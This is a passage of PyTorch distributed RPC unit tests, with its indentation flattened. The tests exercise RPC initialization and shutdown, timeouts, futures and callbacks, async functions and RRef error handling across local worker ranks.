@dist_init(setup_rpc=False)
def test_local_shutdown(self):
# test that we can start RPC and then immediately locally shutdown
# without sending any messages.
rpc.init_rpc(
name="worker%d" % self.rank,
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
# pass in graceful=False to ensure that we don't wait for other workers.
rpc.shutdown(graceful=False)
@dist_init
def test_debug_info(self):
# only test keys in this test case. Values should be covered by
# individual module debug info tests
import torch.distributed.autograd as dist_autograd
info = _get_debug_info()
rref_info = _rref_context_get_debug_info()
agent_info = rpc.api._get_current_rpc_agent().get_debug_info()
autograd_info = dist_autograd._get_debug_info()
common_keys = rref_info.keys() & agent_info.keys() & autograd_info.keys()
self.assertEqual(0, len(common_keys))
expected = {}
expected.update(rref_info)
expected.update(agent_info)
expected.update(autograd_info)
# NB: Key ordering is only preserved in python 3.6+. So here, we
# manually check keys are equal.
for key in expected.keys():
self.assertIn(key, info.keys())
for key in info.keys():
self.assertIn(key, expected.keys())
@dist_init(setup_rpc=False)
@sandcastle_skip_if(
IS_MACOS,
"Test is flaky on MacOS since libuv error handling is not as robust as TCP",
)
def test_handle_send_exceptions(self):
# test that if a callee node has gone down, we raise an appropriate
# exception instead of just crashing.
rpc.init_rpc(
name="worker%d" % self.rank,
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
rpc._set_rpc_timeout(10)
# This barrier is needed to ensure that some workers do not exit before
# others have been brought up.
initialize_pg(self.file_init_method, self.rank, self.world_size)
dist.barrier()
if self.rank == 1:
dst_rank = (self.rank + 1) % self.world_size
dst_worker = worker_name(dst_rank)
# allow destination worker to exit without joining
error_str = self.get_shutdown_error_regex()
wait_until_node_failure(dst_rank, error_str)
fut = rpc.rpc_async(dst_worker, torch.add, args=(torch.ones(1), 3))
# Shutdown sequence is not very well defined and as a result
# we can see any of the error messages defined in get_shutdown_error_regex.
with self.assertRaisesRegex(RuntimeError, error_str):
fut.wait()
# exit all workers non-gracefully.
rpc.shutdown(graceful=False)
@dist_init
def test_deadlock(self):
# this test is copied from https://github.com/pytorch/pytorch/issues/45089
if self.rank == 1:
dst1 = worker_name((self.rank + 1) % self.world_size)
x = torch.ones(2)
y = torch.ones(2)
rpc.rpc_async(dst1, RpcTest._slow_add, args=(x, y), timeout=15).wait()
dist_initialized = dist.is_initialized()
if not dist_initialized:
dist.init_process_group(
backend="gloo",
init_method=self.file_init_method,
rank=self.rank,
world_size=self.world_size,
)
@dist_init(setup_rpc=False)
def test_local_shutdown_with_rpc(self):
# test that we can start RPC, send RPCs, and then run local shutdown.
rpc.init_rpc(
name="worker%d" % self.rank,
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
n = self.rank + 1
dst_rank = n % self.world_size
rpc.rpc_sync(
worker_name(dst_rank),
torch.add,
args=(torch.ones(n, n), torch.ones(n, n)),
)
# A barrier is needed to ensure that all RPCs are processed.
# Otherwise, some RPCs can timeout since the receiving end
# has terminated.
initialize_pg(self.file_init_method, self.rank, self.world_size)
dist.barrier()
# pass in graceful=False to ensure that we don't wait for other workers.
rpc.shutdown(graceful=False)
@dist_init(setup_rpc=False)
def test_set_and_get_default_rpc_timeout(self):
timeout = 0.5
# A new `RpcBackendOptions` is constructed
# when accessing `self.rpc_backend_options`.
rpc_backend_options = self.rpc_backend_options
rpc_backend_options.rpc_timeout = timeout
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=rpc_backend_options,
)
set_timeout = rpc.get_rpc_timeout()
self.assertEqual(timeout, set_timeout)
rpc.shutdown()
@dist_init
def test_default_timeout_used(self):
"""
Tests that if no timeout is passed into rpc_async and rpc_sync, then the
default timeout is used.
"""
dst_rank = (self.rank + 1) % self.world_size
rpc._set_rpc_timeout(0.001) # 1 ms
# futures should time out and be marked with an exception indicating it as such.
futs = [
rpc.rpc_async(worker_name(dst_rank), my_sleep_func, args=())
for _ in range(10)
]
expected_error = self.get_timeout_error_regex()
for fut in futs:
with self.assertRaisesRegex(RuntimeError, expected_error):
fut.wait()
# ensure that if a new timeout is set old futures don't time out but new ones do.
rpc._set_rpc_timeout(200) # 200 seconds
# create a longstanding RPC.
fut1 = rpc.rpc_async(worker_name(dst_rank), my_sleep_func, args=(1,))
# now, set a short timeout.
rpc._set_rpc_timeout(0.001)
# fut2 should time out, fut1 should not.
fut2 = rpc.rpc_async(worker_name(dst_rank), my_sleep_func, args=(1,))
with self.assertRaisesRegex(RuntimeError, expected_error):
fut2.wait()
fut1.wait()
# Zero timeout means infinity, so future should run to completion.
rpc._set_rpc_timeout(0)
rpc.rpc_async(worker_name(dst_rank), my_sleep_func, args=()).wait()
# reset to default timeout so shutdown messages can process cleanly.
rpc._set_rpc_timeout(rpc.constants.DEFAULT_RPC_TIMEOUT_SEC)
@dist_init
def test_rpc_timeouts(self):
# TODO: enable timeouts for rpc.remote/RRef (https://github.com/pytorch/pytorch/issues/33803)
dst_rank = (self.rank + 1) % self.world_size
dst_worker = worker_name(dst_rank)
timeout = 0.1 # 100 ms
expected_error = self.get_timeout_error_regex()
# Test async UDF
fut = rpc.rpc_async(dst_worker, my_sleep_func, args=(1,), timeout=timeout)
with self.assertRaisesRegex(RuntimeError, expected_error):
fut.wait()
# Ensure run to completion if there is no timeout and we use the default
# RPC timeout.
rpc.rpc_async(dst_worker, my_sleep_func, args=(1,)).wait()
# Test sync UDF
with self.assertRaisesRegex(RuntimeError, expected_error):
rpc.rpc_sync(dst_worker, my_sleep_func, args=(1,), timeout=timeout)
# Ensure run to completion if there is no timeout and we use the default
# RPC timeout.
rpc.rpc_sync(dst_worker, my_sleep_func, args=(1,))
# If we set a default timeout for RPCs, it should be respected, though
# still overridden if we pass in a different timeout to the APIs.
rpc._set_rpc_timeout(0.001)
fut = rpc.rpc_async(dst_worker, my_sleep_func, args=(1,))
with self.assertRaisesRegex(RuntimeError, expected_error):
fut.wait()
with self.assertRaisesRegex(RuntimeError, expected_error):
rpc.rpc_sync(dst_worker, my_sleep_func, args=(1,))
# The RPCs should run to completion since we override the timeout.
rpc.rpc_async(dst_worker, my_sleep_func, args=(1,), timeout=5).wait()
rpc.rpc_sync(dst_worker, my_sleep_func, args=(1,), timeout=5)
# Passing in a zero timeout should ensure that the RPC won't time out.
rpc.rpc_async(dst_worker, my_sleep_func, args=(1,), timeout=0).wait()
rpc.rpc_sync(dst_worker, my_sleep_func, args=(1,), timeout=0)
# Reset for clean shutdown
rpc._set_rpc_timeout(rpc.constants.DEFAULT_RPC_TIMEOUT_SEC)
def test_dist_init_decorator(self):
@dist_init(setup_rpc=False)
def test_func(self):
return "expected result"
self.assertEqual(test_func(self), "expected result")
@dist_init
def test_func(self):
return "expected result"
self.assertEqual(test_func(self), "expected result")
def test_use_rpc_pickler(self):
class TestPickler:
pass
test_pickler = TestPickler()
with _use_rpc_pickler(test_pickler):
self.assertTrue(torch.distributed.rpc.api._default_pickler is test_pickler)
self.assertTrue(
torch.distributed.rpc.api._default_pickler is _internal_rpc_pickler
)
@dist_init
def test_wait_all(self):
with _wait_all():
self.assertTrue(_thread_local_var.future_list == [])
dst = worker_name((self.rank + 1) % self.world_size)
fut = rpc.rpc_async(dst, torch.add, (torch.ones(2, 2), 1))
self.assertTrue(len(_thread_local_var.future_list) == 1)
self.assertTrue(isinstance(_thread_local_var.future_list[0], torch._C.Future))
self.assertTrue(fut.done())
self.assertEqual(fut.wait(), torch.ones(2, 2) + 1)
self.assertFalse(hasattr(_thread_local_var, "future_list"))
@dist_init
def test_wait_all_multiple_call(self):
with _wait_all():
self.assertTrue(_thread_local_var.future_list == [])
dst = worker_name((self.rank + 1) % self.world_size)
for i in range(20):
fut = rpc.rpc_async(dst, torch.add, (torch.ones(i, i), 1))
res = rpc.rpc_sync(dst, torch.add, (torch.ones(i, i), 1))
self.assertEqual(res, torch.ones(i, i) + 1)
self.assertEqual(fut.wait(), torch.ones(i, i) + 1)
self.assertTrue(len(_thread_local_var.future_list) == 20)
self.assertFalse(hasattr(_thread_local_var, "future_list"))
@dist_init
def test_wait_all_timeout(self):
expected_error = self.get_timeout_error_regex()
with self.assertRaisesRegex(RuntimeError, expected_error):
with _wait_all():
self.assertTrue(_thread_local_var.future_list == [])
dst = worker_name((self.rank + 1) % self.world_size)
timeout = 0.1 # 100 ms
fut = rpc.rpc_async(dst, my_sleep_func, args=(1,), timeout=timeout)
self.assertFalse(hasattr(_thread_local_var, "future_list"))
@dist_init
def test_wait_all_raise_in_user_func(self):
with self.assertRaises(ValueError):
with _wait_all():
self.assertTrue(_thread_local_var.future_list == [])
dst = worker_name((self.rank + 1) % self.world_size)
fut = rpc.rpc_async(dst, raise_func)
self.assertFalse(hasattr(_thread_local_var, "future_list"))
@dist_init
def test_wait_all_raise_in_body(self):
with self.assertRaises(ValueError):
with _wait_all():
raise_func()
self.assertFalse(hasattr(_thread_local_var, "future_list"))
timed_out_rpc_event = None
@staticmethod
def timed_out_rpc():
RpcTest.timed_out_rpc_event.wait()
@dist_init
def test_wait_all_exit_early_python(self):
# Initialize the event in the subprocess.
RpcTest.timed_out_rpc_event = Event()
# Wait for all processes to initialize event.
initialize_pg(self.file_init_method, self.rank, self.world_size)
dist.barrier()
dst = worker_name((self.rank + 1) % self.world_size)
fut1 = rpc.rpc_async(dst, RpcTest.timed_out_rpc)
fut2 = rpc.rpc_async(dst, raise_func)
fut3 = rpc.rpc_async(dst, raise_func)
# We should receive the error from fut2
with self.assertRaisesRegex(ValueError, expected_err):
torch.futures.wait_all([fut1, fut2, fut3])
# Unblock RPC thread for fut1
RpcTest.timed_out_rpc_event.set()
@dist_init
def test_wait_all_exit_early_builtin(self):
# Initialize the event in the subprocess.
RpcTest.timed_out_rpc_event = Event()
# Wait for all processes to initialize event.
initialize_pg(self.file_init_method, self.rank, self.world_size)
dist.barrier()
dst = worker_name((self.rank + 1) % self.world_size)
fut1 = rpc.rpc_async(dst, RpcTest.timed_out_rpc)
fut2 = rpc.rpc_async(dst, torch.add, args=(torch.rand(10), torch.rand(5)))
fut3 = rpc.rpc_async(dst, torch.add, args=(torch.rand(10), torch.rand(5)))
# We should receive the error from fut2
with self.assertRaisesRegex(RuntimeError, "size of tensor"):
torch.futures.wait_all([fut1, fut2, fut3])
# Unblock RPC thread for fut1
RpcTest.timed_out_rpc_event.set()
@dist_init
def test_wait_all_exit_early_script_function(self):
# Initialize the event in the subprocess.
RpcTest.timed_out_rpc_event = Event()
# Wait for all processes to initialize event.
initialize_pg(self.file_init_method, self.rank, self.world_size)
dist.barrier()
dst = worker_name((self.rank + 1) % self.world_size)
fut1 = rpc.rpc_async(dst, RpcTest.timed_out_rpc)
fut2 = rpc.rpc_async(dst, raise_func_script, args=(expected_err,))
fut3 = rpc.rpc_async(dst, raise_func_script, args=(expected_err,))
# We should receive the error from fut2
with self.assertRaisesRegex(RuntimeError, expected_err):
torch.futures.wait_all([fut1, fut2, fut3])
# Unblock RPC thread for fut1
RpcTest.timed_out_rpc_event.set()
@dist_init
def test_function_not_on_callee(self):
# test that if a function does not exist on a callee, we don't crash,
# instead we get an AttributeError indicating that the func does not exist.
this_module = sys.modules[__name__]
caller_worker = "worker0"
callee_worker = "worker1"
if self.rank == 1:
# Use delattr to remove the binding of a func on this nodes
delattr(this_module, "foo_add")
# notify remote end that we have removed it.
rpc.rpc_sync(caller_worker, set_value, args=(self.rank,))
if self.rank == 0:
# func exists on caller, but not callee.
# wait for remote end to remove the binding of foo_add func.
wait_for_value_future()
# Ensure that we have the attribute on this module. Otherwise, the test could fail due to a caller-side pickling error.
self.assertTrue(hasattr(this_module, "foo_add"))
with self.assertRaisesRegex(
RuntimeError, "RPC pickler does not serialize"
):
rpc.rpc_sync(callee_worker, foo_add, args=())
@dist_init
def test_non_garbage_collected_user_rref_due_to_local_circular_dependency(self):
dst_worker_name = worker_name((self.rank + 1) % self.world_size)
a = MyClass(1)
b = MyClass(2)
# This is to make Python not garbage collect a and b.
a.other = b
b.other = a
n = self.rank
a.rref = rpc.remote(
dst_worker_name,
torch.add,
args=(torch.ones(n, n), 2)
)
@dist_init(setup_rpc=False)
def test_use_rref_after_shutdown(self):
rpc.init_rpc(
name="worker%d" % self.rank,
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
n = self.rank + 1
dst_rank = n % self.world_size
rref = rpc.remote(
worker_name(dst_rank),
torch.add,
args=(torch.ones(n, n), torch.ones(n, n)),
)
# pass in graceful=True to ensure that local UserRRefs are deleted.
rpc.shutdown(graceful=True)
with self.assertRaisesRegex(
RuntimeError, "Cannot call to_here\\(\\) on it after deletion."
):
rref.to_here()
with self.assertRaisesRegex(
RuntimeError, "Cannot call fork an UserRRef after deletion."
):
import torch.distributed.rpc.internal as internal
internal.serialize(rref)
@staticmethod
def _return_gpu_tensor():
return torch.rand(3, 3).cuda(0)
@staticmethod
def _return_gpu_tensor_list():
return [torch.rand(3, 3).cuda(0), torch.rand(3, 3).cuda(1)]
@staticmethod
def _gpu_tensor_list_arg(tensor_list):
return torch.rand(3, 3)
def _create_rref(self):
owner_rank = (self.rank + 2) % self.world_size
return rpc.remote(
worker_name(owner_rank),
torch.add,
args=(torch.zeros(2, 2), 1)
)
@dist_init
def test_user_rrefs_confirmed(self):
dst_rank = (self.rank + 1) % self.world_size
rref = self._create_rref()
ret = rpc.rpc_sync(
worker_name(dst_rank),
check_rref_confirmed,
args=(rref,)
)
self.assertEqual(ret, True)
@dist_init
def test_user_rrefs_confirmed_remote(self):
dst_rank = (self.rank + 1) % self.world_size
rref = self._create_rref()
ret_rref = rpc.remote(
worker_name(dst_rank),
check_rref_confirmed,
args=(rref,)
)
self.assertEqual(ret_rref.to_here(), True)
@dist_init
def test_rref_py_pickle_not_supported(self):
local_rref = RRef(35)
with TemporaryFileName() as fname:
with self.assertRaisesRegex(RuntimeError, "Can not pickle rref in python pickler"):
torch.save(local_rref, fname)
@dist_init
def test_remote_throw(self):
rref = rpc.remote(worker_name((self.rank + 1) % self.world_size),
raise_or_inc,
args=(torch.ones(2),))
with self.assertRaisesRegex(Exception, ".*Expected error.*"):
rref.to_here()
@dist_init
def test_non_cont_tensors(self):
if self.rank == 0:
# Create a non-contiguous tensor.
t = torch.rand(5, 5)
t_view = t.narrow(1, 2, 2)
self.assertFalse(t_view.is_contiguous())
t_cont = t_view.contiguous()
self.assertTrue(t_cont.is_contiguous())
self.assertEqual(t_view, t_cont)
# Send non-cont tensor over RPC.
next_rank = (self.rank + 1) % self.world_size
t_ret = rpc.rpc_sync(worker_name(next_rank), non_cont_test, args=(t_view, t_cont))
# Verify the returned tensor.
self.assertEqual(t_view, t_ret)
self.assertFalse(t_ret.is_contiguous())
@dist_init
def test_callback_simple(self):
set_by_cb = concurrent.futures.Future()
n = self.rank + 1
def callback(fut):
ret = fut.wait()
self.assertEqual(ret, torch.ones(n, n) * 2)
set_by_cb.set_result(ret.clone() + 1)
fut = rpc.rpc_async(
worker_name(n % self.world_size),
torch.add,
args=(torch.ones(n, n), torch.ones(n, n))
)
fut.then(callback)
self.assertEqual(fut.wait(), torch.ones(n, n) * 2)
self.assertEqual(set_by_cb.result(), torch.ones(n, n) * 2 + 1)
self.assertEqual(fut.wait(), torch.ones(n, n) * 2)
@dist_init
def test_callback_wrong_arg_num(self):
set_by_cb = concurrent.futures.Future()
n = self.rank + 1
fut = rpc.rpc_async(
worker_name(n % self.world_size),
torch.add,
args=(torch.ones(n, n), torch.ones(n, n))
)
cb_fut = fut.then(my_function)
self.assertEqual(fut.wait(), torch.ones(n, n) * 2)
with self.assertRaisesRegex(
RuntimeError,
"my\\_function\\(\\) missing 2 required positional arguments"
):
cb_fut.wait()
@dist_init
def test_callback_wrong_arg_type(self):
dst = worker_name((self.rank + 1) % self.world_size)
fut0 = rpc.rpc_async(dst, torch.add, args=(torch.ones(2, 2), 1))
fut1 = fut0.then(lambda x: x + 1)
with self.assertRaisesRegex(
RuntimeError,
"unsupported operand type\\(s\\) for \\+"
):
fut1.wait()
@dist_init
def test_callback_multi(self):
num_cbs = 10
n = self.rank + 1
def callback(idx, fut):
ret = fut.wait()
self.assertEqual(ret, torch.ones(n, n) * 2)
return ret + idx
fut = rpc.rpc_async(
worker_name(n % self.world_size),
torch.add,
args=(torch.ones(n, n), torch.ones(n, n))
)
cb_futs = []
for idx in range(num_cbs):
cb_futs.append(fut.then(partial(callback, idx)))
self.assertEqual(fut.wait(), torch.ones(n, n) * 2)
for idx in range(num_cbs):
self.assertEqual(
cb_futs[idx].wait(),
torch.ones(n, n) * 2 + idx
)
self.assertEqual(fut.wait(), torch.ones(n, n) * 2)
@dist_init
def test_callback_chain(self):
n = self.rank + 1
dst = worker_name(n % self.world_size)
def callback(fut):
return fut.wait() + 1
fut = rpc.rpc_async(
worker_name(n % self.world_size),
torch.add,
args=(torch.ones(n, n), 1)
)
num_cbs = 20
for _ in range(num_cbs):
fut = fut.then(callback)
self.assertEqual(fut.wait(), torch.ones(n, n) + 1 + num_cbs)
@dist_init
def test_callback_in_rpc(self):
dst1 = worker_name((self.rank + 1) % self.world_size)
dst2 = worker_name((self.rank + 2) % self.world_size)
ret = rpc.rpc_sync(
dst1,
add_use_future_cb,
args=(dst2, torch.ones(2, 2), 1, 2)
)
self.assertEqual(ret, torch.ones(2, 2) + 1 + 2)
@dist_init
def test_callback_with_ret(self):
dst = worker_name((self.rank + 1) % self.world_size)
def callback(fut0):
fut2 = rpc.rpc_async(
dst,
torch.add,
args=(fut0.wait(), 1)
).then(lambda fut1: fut1.wait() + 1)
return fut2.wait()
fut3 = rpc.rpc_async(
dst,
torch.add,
args=(torch.ones(2, 2), 1)
).then(callback)
self.assertEqual(fut3.wait(), torch.ones(2, 2) + 3)
@dist_init
def test_callback_with_error(self):
dst = worker_name((self.rank + 1) % self.world_size)
def callback(fut0):
with self.assertRaisesRegex(ValueError, "Expected error"):
fut0.wait()
raise RuntimeError("Another expected error")
fut1 = rpc.rpc_async(dst, raise_func).then(callback)
with self.assertRaisesRegex(RuntimeError, "Another expected error"):
fut1.wait()
@dist_init
def test_callback_none(self):
dst = worker_name((self.rank + 1) % self.world_size)
with self.assertRaisesRegex(
TypeError,
"incompatible function arguments."
):
rpc.rpc_async(dst, raise_func).then(None)
@dist_init
def test_add_done_callback(self):
set_by_cb = False
n = self.rank + 1
def callback(fut):
nonlocal set_by_cb
fut.wait()
set_by_cb = True
fut = rpc.rpc_async(
worker_name(n % self.world_size),
torch.add,
args=(torch.ones(n, n), torch.ones(n, n))
)
fut.add_done_callback(callback)
fut_then = fut.then(lambda _: True)
self.assertEqual(fut.wait(), torch.ones(n, n) * 2)
# We have no guarantee that the add_done_callback fn will execute before the test finishes.
# Adding a 'then' callback that runs afterwards to guarantee we wait for the first callback
fut_then.wait()
self.assertTrue(set_by_cb)
self.assertEqual(fut.wait(), torch.ones(n, n) * 2)
@dist_init
def test_mark_future_twice(self):
fut = rpc.rpc_async(
worker_name((self.rank + 1) % self.world_size),
torch.add,
args=(torch.zeros(2, 2), 1)
)
self.assertEqual(fut.wait(), torch.zeros(2, 2) + 1)
with self.assertRaisesRegex(
RuntimeError,
"Future can only be marked completed once"
):
fut.set_result(1)
@dist_init
def test_pickle_future(self):
fut = torch.futures.Future()
errMsg = "Can not pickle torch.futures.Future"
dst = worker_name((self.rank + 1) % self.world_size)
with TemporaryFileName() as fname:
with self.assertRaisesRegex(RuntimeError, errMsg):
rpc.rpc_sync(dst, fail_on_fut, args=(fut,))
with TemporaryFileName() as fname:
with self.assertRaisesRegex(RuntimeError, errMsg):
rpc.rpc_async(dst, fail_on_fut, args=(fut,))
with TemporaryFileName() as fname:
with self.assertRaisesRegex(RuntimeError, errMsg):
rpc.remote(dst, fail_on_fut, args=(fut,))
@dist_init
def test_future_done(self):
dst = worker_name((self.rank + 1) % self.world_size)
fut = rpc.rpc_async(dst, torch.add, args=(torch.zeros(2), 1))
fut.wait()
self.assertTrue(fut.done())
@dist_init
def test_future_done_exception(self):
dst = worker_name((self.rank + 1) % self.world_size)
fut = rpc.rpc_async(dst, raise_func)
with self.assertRaisesRegex(ValueError, "Expected error"):
fut.wait()
self.assertTrue(fut.done())
def _test_future_cb(self, func):
dst1 = worker_name((self.rank + 1) % self.world_size)
dst2 = worker_name((self.rank + 2) % self.world_size)
ret = rpc.rpc_sync(
dst1,
func,
args=(dst2, torch.ones(2, 2), 1, 2)
)
self.assertEqual(ret, torch.ones(2, 2) + 1 + 2)
@dist_init
def test_future_in_rpc(self):
self._test_future_cb(add_use_future_set_result)
@dist_init
def test_future_nested_callback(self):
self._test_future_cb(add_use_future_nested_cb)
def _test_async_function_raise(self, mode):
with self.assertRaisesRegex(RuntimeError, "Expected error"):
self._run_func_in_mode(
worker_name((self.rank + 1) % self.world_size),
async_raise_func,
mode
)
@dist_init
def test_async_function_raise(self):
self._test_async_function_raise(RPCExecMode.SYNC)
@dist_init
def test_async_function_raise_async(self):
self._test_async_function_raise(RPCExecMode.ASYNC)
@dist_init
def test_async_function_raise_remote(self):
self._test_async_function_raise(RPCExecMode.REMOTE)
def _test_async_function_wrong_return_type(self, mode):
errMsg = (
"Functions decorated with @rpc\\.async_function must return a "
"torch\\.futures\\.Future object,"
)
with self.assertRaisesRegex(RuntimeError, errMsg):
self._run_func_in_mode(
worker_name((self.rank + 1) % self.world_size),
async_wrong_type,
mode
)
@dist_init
def test_async_function_wrong_return_type(self):
self._test_async_function_wrong_return_type(RPCExecMode.SYNC)
@dist_init
def test_async_function_wrong_return_type_async(self):
self._test_async_function_wrong_return_type(RPCExecMode.ASYNC)
@dist_init
def test_async_function_wrong_return_type_remote(self):
self._test_async_function_wrong_return_type(RPCExecMode.REMOTE)
@dist_init
def test_async_function_simple(self):
dst1 = worker_name((self.rank + 1) % self.world_size)
dst2 = worker_name((self.rank + 2) % self.world_size)
ret = rpc.rpc_sync(dst1, async_add, args=(dst2, torch.ones(2, 2), 1))
self.assertEqual(ret, torch.ones(2, 2) + 1)
def _test_async_function(self, fn, mode=RPCExecMode.SYNC):
dst1 = worker_name((self.rank + 1) % self.world_size)
dst2 = worker_name((self.rank + 2) % self.world_size)
args = (dst2, torch.ones(2, 2), 1, 2)
ret = self._run_func_in_mode(dst1, fn, mode, args=args)
self.assertEqual(ret, torch.ones(2, 2) + 3)
@dist_init
def test_async_function_with_future_ctor(self):
self._test_async_function(async_add_with_future_ctor)
@dist_init
def test_async_function_with_future_ctor_remote(self):
self._test_async_function(
async_add_with_future_ctor,
RPCExecMode.REMOTE
)
@dist_init
def test_async_function_chained(self):
self._test_async_function(async_add_chained)
@dist_init
def test_async_function_chained_remote(self):
self._test_async_function(async_add_chained, RPCExecMode.REMOTE)
@dist_init
def test_async_function_nested(self):
self._test_async_function(async_add_nested)
@dist_init
def test_async_function_nested_remote(self):
self._test_async_function(async_add_nested, RPCExecMode.REMOTE)
@dist_init
def test_async_static_method(self):
self._test_async_function(AsyncExecutionClass.static_async_add)
@dist_init
def test_async_static_method_remote(self):
self._test_async_function(
AsyncExecutionClass.static_async_add,
RPCExecMode.REMOTE
)
@dist_init
def test_async_class_method(self):
self._test_async_function(AsyncExecutionClass.class_async_add)
@dist_init
def test_async_class_method_remote(self):
self._test_async_function(
AsyncExecutionClass.class_async_add,
RPCExecMode.REMOTE
)
def _test_test_async_class_rref_proxy(self, mode=RPCExecMode.SYNC):
dst1 = worker_name((self.rank + 1) % self.world_size)
dst2 = worker_name((self.rank + 2) % self.world_size)
rref = rpc.remote(dst1, AsyncExecutionClass)
x = torch.ones(2, 2)
y = torch.ones(2, 2) + 1
if mode == RPCExecMode.SYNC:
ret = rref.rpc_sync().static_async_add(dst2, x, x, y)
ret += rref.rpc_sync().class_async_add(dst2, x, x, y)
ret += rref.rpc_sync().bound_async_add(dst2, x, x, y)
elif mode == RPCExecMode.ASYNC:
ret = rref.rpc_async().static_async_add(dst2, x, x, y).wait()
ret += rref.rpc_async().class_async_add(dst2, x, x, y).wait()
ret += rref.rpc_async().bound_async_add(dst2, x, x, y).wait()
elif mode == RPCExecMode.REMOTE:
ret = rref.remote().static_async_add(dst2, x, x, y).to_here()
ret += rref.remote().class_async_add(dst2, x, x, y).to_here()
ret += rref.remote().bound_async_add(dst2, x, x, y).to_here()
self.assertEqual(ret, 3 * 4 * x)
@dist_init
def test_async_class_rref_proxy(self):
self._test_test_async_class_rref_proxy()
@dist_init
def test_async_class_rref_proxy_async(self):
self._test_test_async_class_rref_proxy(mode=RPCExecMode.ASYNC)
@dist_init
def test_async_class_rref_proxy_remote(self):
self._test_test_async_class_rref_proxy(mode=RPCExecMode.REMOTE)
def _test_async_function_multi(self, fn, mode=RPCExecMode.SYNC):
dst1 = worker_name((self.rank + 1) % self.world_size)
dst2 = worker_name((self.rank + 2) % self.world_size)
num = 20
step = 3
args = (dst2, torch.ones(2, 2), num, step)
ret = self._run_func_in_mode(dst1, fn, mode, args=args)
self.assertEqual(ret, torch.ones(2, 2) + num * step)
@dist_init
def test_async_function_multi_chained(self):
self._test_async_function_multi(async_add_chained_multi)
@dist_init
def test_async_function_multi_chained_async(self):
self._test_async_function_multi(
async_add_chained_multi,
RPCExecMode.ASYNC
)
@dist_init
def test_async_function_multi_chained_remote(self):
self._test_async_function_multi(
async_add_chained_multi,
RPCExecMode.REMOTE
)
@dist_init
def test_async_function_multi_fanout(self):
self._test_async_function_multi(async_add_multi_fanout)
@dist_init
def test_async_function_multi_fanout_async(self):
self._test_async_function_multi(
async_add_multi_fanout,
RPCExecMode.ASYNC
)
@dist_init
def test_async_function_multi_fanout_remote(self):
self._test_async_function_multi(
async_add_multi_fanout,
RPCExecMode.REMOTE
)
def _test_return_future(self, mode):
with self.assertRaisesRegex(
RuntimeError,
"Can not pickle torch.futures.Future"
):
self._run_func_in_mode(
worker_name((self.rank + 1) % self.world_size),
return_future,
mode
)
@dist_init
def test_return_future(self):
self._test_return_future(RPCExecMode.SYNC)
@dist_init
def test_return_future_async(self):
self._test_return_future(RPCExecMode.ASYNC)
@dist_init
def test_return_future_remote(self):
self._test_return_future(RPCExecMode.REMOTE)
@dist_init
def test_rref_timeout(self):
# This test is similar to ones in FaultyProcessGroupTest, but is meant to be
# run with other backends besides ProcessGroup.
if self.rank != 0:
return
dst_rank = (self.rank + 1) % self.world_size
dst_worker = "worker{}".format(dst_rank)
# 10 ms timeout
rref = rpc.remote(dst_worker, my_sleep_func, args=(2, ), timeout=0.01)
# Future corresponding to the remote creation should time out.
expected_error = self.get_timeout_error_regex()
with self.assertRaisesRegex(RuntimeError, expected_error):
rref._get_future().wait()
# Call to ensure pending callbacks are run.
wait_until_pending_futures_and_users_flushed()
with self.assertRaisesRegex(RuntimeError, "RRef creation"):
rref.to_here()
wait_until_owners_and_forks_on_rank(1, 1, rank=1)
@dist_init(setup_rpc=False)
@sandcastle_skip_if(
os.environ.get("RPC_INIT_WITH_TCP", None) == "1",
"init_pg_then_rpc does not work with TCP init, see https://github.com/pytorch/pytorch/issues/41614."
)
def test_init_pg_then_rpc(self):
dist.init_process_group(
backend="gloo",
init_method=self.init_method,
rank=self.rank,
world_size=self.world_size,
)
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
# Test RPC.
next_rank = (self.rank + 1) % self.world_size
ret = rpc.rpc_sync(worker_name(next_rank), torch.add, args=(torch.ones(2, 2), 1))
self.assertEqual(ret, torch.ones(2, 2) + 1)
# Test PG
dist.barrier()
rpc.shutdown()
@dist_init(setup_rpc=False)
@sandcastle_skip_if(
os.environ.get("RPC_INIT_WITH_TCP", None) == "1",
"init_rpc_then_pg does not work with TCP init, see https://github.com/pytorch/pytorch/issues/41614."
)
def test_init_rpc_then_pg(self):
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
dist.init_process_group(
backend="gloo",
init_method=self.init_method,
rank=self.rank,
world_size=self.world_size,
)
# Test RPC.
next_rank = (self.rank + 1) % self.world_size
ret = rpc.rpc_sync(worker_name(next_rank), torch.add, args=(torch.ones(2, 2), 1))
self.assertEqual(ret, torch.ones(2, 2) + 1)
# Test PG
dist.barrier()
rpc.shutdown()
@dist_init
def test_wait_all_with_exception(self):
futs = []
dst = worker_name((self.rank + 1) % self.world_size)
for _ in range(10):
futs.append(rpc.rpc_async(dst, raise_func))
with self.assertRaisesRegex(ValueError, "Expected error"):
ret = torch.futures.wait_all(futs)
@dist_init
def test_wait_all_with_partial_exception(self):
futs = []
dst = worker_name((self.rank + 1) % self.world_size)
for _ in range(10):
futs.append(rpc.rpc_async(dst, torch.add, args=(torch.ones(2), 1)))
futs.append(rpc.rpc_async(dst, raise_func))
with self.assertRaisesRegex(ValueError, "Expected error"):
ret = torch.futures.wait_all(futs)
@dist_init(setup_rpc=False)
@sandcastle_skip_if(
os.environ.get("RPC_INIT_WITH_TCP", None) == "1",
"Test does not work with TCP init, see https://github.com/pytorch/pytorch/issues/46491",
)
def test_init_rpc_twice(self):
initialize_pg(self.file_init_method, self.rank, self.world_size)
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
rpc.shutdown()
# Wait for all init to complete.
dist.barrier()
# Ensure rpc initialization works again.
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
